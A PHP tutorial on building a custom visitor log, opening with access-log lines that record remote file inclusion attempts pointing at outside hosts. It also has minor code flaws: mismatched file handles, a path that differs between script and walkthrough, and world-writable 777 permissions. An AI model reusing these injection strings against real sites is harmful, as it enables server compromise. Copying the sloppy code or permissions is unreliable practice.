Country IP Blocks

Server Log files are your friend. Depending on your server and server settings your system produces a variety of log files. These may include access, error, SSL, ftp and other logs. Use them to glean important marketing, error correction and security information for your server and/or websites. But some administrators may not have access to their server’ logs or they may want to create specific logs that are easily accessible and provide on the fly information. In this tutorial we will teach you how to create your own security logs.

First, let’s take a look at some data from an actual log file:

121.165.84.230 – - [17/May/2009:09:09:45 -0500] “GET /product.php?page=http://74.208.173.138:4443/index.html? HTTP/1.1″ 302 – “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)”
137.118.143.50 – - [17/May/2009:09:14:17 -0500] “GET /product.php?page=http://144.206.186.112:2666/index.html? HTTP/1.1″ 302 – “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)”
137.118.143.50 – - [17/May/2009:09:33:28 -0500] “GET /product.php?page=http://144.206.186.112:2666/index.html? HTTP/1.1″ 302 – “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)”
77.56.49.61 – - [17/May/2009:10:09:25 -0500] “GET /product.php?page=http://74.208.173.138:4443/index.html? HTTP/1.1″ 302 – “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)”
67.15.206.26 – - [17/May/2009:10:59:12 -0500] “GET /product.php?language=4/?_SERVER[DOCUMENT_ROOT]=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1″ 403 955 “-” “libwww-perl/5.65″
67.15.206.26 – - [17/May/2009:10:59:12 -0500] “GET /?_SERVER[DOCUMENT_ROOT]=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1″ 403 3985 “-” “libwww-perl/5.65″
203.152.213.84 – - [17/May/2009:11:06:26 -0500] “GET /product.php?language=4/?_SERVER[DOCUMENT_ROOT]=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1″ 403 955 “-” “libwww-perl/5.803″
203.152.213.84 – - [17/May/2009:11:06:26 -0500] “GET /?_SERVER[DOCUMENT_ROOT]=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1″ 403 3985 “-” “libwww-perl/5.803″
95.208.88.96 – - [17/May/2009:11:42:49 -0500] “GET /product.php?page=http://74.208.173.138:4443/index.html? HTTP/1.1″ 302 – “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)”

As you can see, some antisocial miscreants are attempting script injection exploits using remote websites. As a side not, it is likely that neither the website owners nor those assigned the originating IPs are aware of this malicious use.

What we want to do in this tutorial is use PHP to write certain data to a custom log file.

We want to log the following visitor information: IP address, date/time of visit, method used to access the page, the page accessed, the query used, if any, to access the page and the UNIX timestamp (this is redundant but provides an alternative method for retrieving and storing date/time information).

Terms You Need to Know:

function: a reusable piece of code that is called using a function call. This will be the code we use to write data to a file.

handle: A file pointer. This will point to the file we are using to write and append our log.

fopen: a PHP function used to open files. We will use this function to open our log for appending.

fclose: a PHP function used to close files. We will use this function to close our file when we are through appending data.

fwrite: a PHP function used to write to an open file. We will use this function to write and append our log file.

chmod: a function to change file permissions. We will use this to change our file permissions to 644.

date(“Y-m-d H:i:s”, time()): PHP functions that allow you to extract and format the date and time on the server. We will use these functions to extract the data and time a visitor comes to a webpage.

$_SERVER is an array containing information such as headers, paths, and script locations.

$_SERVER['REMOTE_ADDR']: The IP address from which the user is viewing the current page.

$_SERVER['REQUEST_METHOD']: Which request method was used to access the page; i.e. ‘GET’, ‘HEAD’, ‘POST’, ‘PUT’.

$_SERVER['PHP_SELF']: The filename of the currently executing script, relative to the document root. This will tell us which page was visited.

$_SERVER['QUERY_STRING']: The query string, if any, via which the page was accessed.

$_SERVER['REQUEST_TIME']: The timestamp of the start of the request. Available since PHP 5.1.0. This returns a UNIX timestamp, showing seconds since the epoch (Jan 1, 1970).

Concatenation Operator: The concatenation operator (.)  is used to put two string values together.

The first thing we need to do is to create a writeable directory to store our log file. For the purpose of this lesson create a directory called my_log on your web server. If you use this script on a production server we recommend changing the name of this directory. Make the directory writable. For this illustration we will use 777 as our permission settings.

Now we will create a function called create_server_log() and save the file as create_server_log.php. Here is what the script will look like:

<?php

function create_server_log() {

$handle = fopen(“my_log/server_logs.txt”, “a+”);

chmod(“my_log/server_logs.txt”, 0644);

$fp = fopen(“my_log/server_logs.txt”, “a”);

$s_remote = $_SERVER['REMOTE_ADDR'] . “|” . date(“Y-m-d H:i:s”, time()) . “|” . $_SERVER['REQUEST_METHOD'] . “|” . $_SERVER['PHP_SELF'] . “|” . $_SERVER['QUERY_STRING'] . “|” . $_SERVER['REQUEST_TIME'] . “\n”;
fwrite($fp, $s_remote);

fclose($handle);

}
?>

This script does the following:

First is creates a function called create_server_log():

<?php

function create_server_log() {

Then it creates a file pointer called $handle. This will open a writeable directory called my_log/ and our log file called server_logs.txt. The file will be opened for appending.

$handle = fopen(“my_log/server_logs.txt”, “a+”);

Then it changes the file permissions to 644:

chmod(“my_log/server_logs.txt”, 0644);

Then we use a file pointer to open our file for appending:

$fp = fopen(“e_logs/server_logs.txt”, “a”);

Then we create a variable called $s_remote and use it to contain all the $_SERVER variables we want to grab. We will use PHP concatenation (.) to join the string of $_SERVER variables together separated by a pipe (|) to make the log file easier to read and finish it off with a new-line “\n” so each visit will result in apending a new-line to the log:

$s_remote = $_SERVER['REMOTE_ADDR'] . “|” . date(“Y-m-d H:i:s”, time()) . “|” . $_SERVER['REQUEST_METHOD'] . “|” . $_SERVER['PHP_SELF'] . “|” . $_SERVER['QUERY_STRING'] . “|” . $_SERVER['REQUEST_TIME'] . “\n”;

We the use the fwrite() function to write the data to the log file:

fwrite($fp, $s_remote);

And finally, we close the file handle and the function:

fclose($handle);

}

Make sure you save the file as create_server_log.php. You can then add this function to any page by using a PHP include and function call. The top of your PHP page would look something like this:

<?php
include(“create_server_log.php”);

create_server_log();
?>

A resultant server log created with this function might look something like this:

74.54.108.162|2009-05-17 13:39:47|GET|/create_server_log.php|page=test123|1242585587
74.54.108.162|2009-05-17 13:39:50|GET|/create_server_log.php|page=test123|1242585590
74.54.108.162|2009-05-17 13:45:27|GET|/create_server_log.php|page=test123|1242585927
74.54.108.162|2009-05-17 13:56:15|GET|/create_server_log.php|page=test123|1242586575
74.54.108.162|2009-05-17 13:56:34|GET|/create_server_log.php|page=test123|1242586594
74.54.108.162|2009-05-17 13:56:38|GET|/create_server_log.php|page=test123|1242586598
74.54.108.162|2009-05-17 13:56:40|GET|/create_server_log.php|page=test123|1242586600

This is the end of the tutorial: Create Your Own Security Logs. We hope you learned something new.

If you have questions or comments we would appreciate your feedback.